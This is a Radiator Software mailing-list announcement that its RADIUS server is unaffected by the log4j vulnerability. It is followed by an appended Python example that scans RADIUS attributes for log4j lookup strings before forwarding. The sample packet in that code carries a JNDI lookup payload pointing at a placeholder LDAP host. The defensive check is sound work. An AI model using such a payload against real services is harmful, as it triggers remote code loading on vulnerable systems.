[RADIATOR-ANNOUNCE] Radiator is not affected by log4j vulnerability

Daniela Loya dlr at radiatorsoftware.com
Mon Dec 13 10:52:02 UTC 2021


On the 10th of December 2021 a vulnerability (CVE-2021-44228 
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) in log4j, a 
popular Java-based logging utility, was published. Since then, we have 
received some customer queries about whether Radiator is affected.

Radiator does not utilise Java or log4j as a component of our software 
and is therefore not vulnerable to the log4j vulnerability.

While closely following the situation, research, and responses around 
the vulnerability, we have identified that the RADIUS protocol and 
infrastructure can be used to deliver the exploit to more vulnerable 
services such as Java-based backend services, AAA information sources 
and centralised logging systems. We have documented the principle of 
this delivery method in a separate blog post, found here:

https://blog.radiatorsoftware.com/2021/12/radius-servers-and-log4j-vulnerability.html

We will continue to monitor the issue closely and will announce if any 
issues affecting Radiator or Radiator services are found.

-- 
Daniela Loya Ramos
Sales, Radiator Software Oy
www.radiatorsoftware.com
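
A defensive check for the delivery path described in the announcement, added here as an example (not Radiator code and not taken from the linked blog post): it parses a RADIUS packet's attributes and flags text attributes that contain the opening of a log4j lookup expression before they are forwarded to Java-based backends or log collectors. The attribute selection, function names and sample packet are assumptions constructed for illustration.

```python
import re
import struct

# Text-valued attributes worth scanning (numbers from RFC 2865). The selection
# is an assumption for this example; extend it with the attributes and VSAs
# your deployment forwards. Binary ones (User-Password = 2) are left out.
TEXT_ATTRS = {1: "User-Name", 18: "Reply-Message", 30: "Called-Station-Id",
              31: "Calling-Station-Id", 32: "NAS-Identifier"}

# Opening of a log4j lookup expression; kept broad so nested forms also match.
LOOKUP_RE = re.compile(rb"\$\{")

def parse_attributes(packet):
    """Yield (type, value) for each attribute of a RADIUS packet."""
    if len(packet) < 20:
        raise ValueError("shorter than the 20-byte RADIUS header")
    length = struct.unpack("!H", packet[2:4])[0]
    if not 20 <= length <= len(packet):
        raise ValueError("length field does not match packet")
    pos = 20
    while pos < length:
        if pos + 2 > length:
            raise ValueError("truncated attribute header")
        a_type, a_len = packet[pos], packet[pos + 1]
        if a_len < 2 or pos + a_len > length:
            raise ValueError("attribute length out of bounds")
        yield a_type, packet[pos + 2:pos + a_len]
        pos += a_len

def suspicious_attributes(packet):
    """Return [(name, text)] for text attributes containing a lookup opener."""
    return [(TEXT_ATTRS[t], v.decode("utf-8", "replace"))
            for t, v in parse_attributes(packet)
            if t in TEXT_ATTRS and LOOKUP_RE.search(v)]

def build_request(attrs):
    """Build a constructed Access-Request (code 1) with a zero authenticator."""
    body = b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)
    return struct.pack("!BBH", 1, 42, 20 + len(body)) + bytes(16) + body

# Constructed sample: lookup string in User-Name, and a User-Password whose
# encrypted bytes happen to start with "${" (must not be flagged).
SAMPLE = build_request([(1, b"${jndi:ldap://example.invalid/a}"),
                        (2, b"${" + bytes(14)), (32, b"nas01")])

if __name__ == "__main__":
    for name, text in suspicious_attributes(SAMPLE):
        print(f"flag before forwarding: {name}={text!r}")
```

A match is a signal for review or quarantine, not a fix: the vulnerable downstream log4j component still has to be patched.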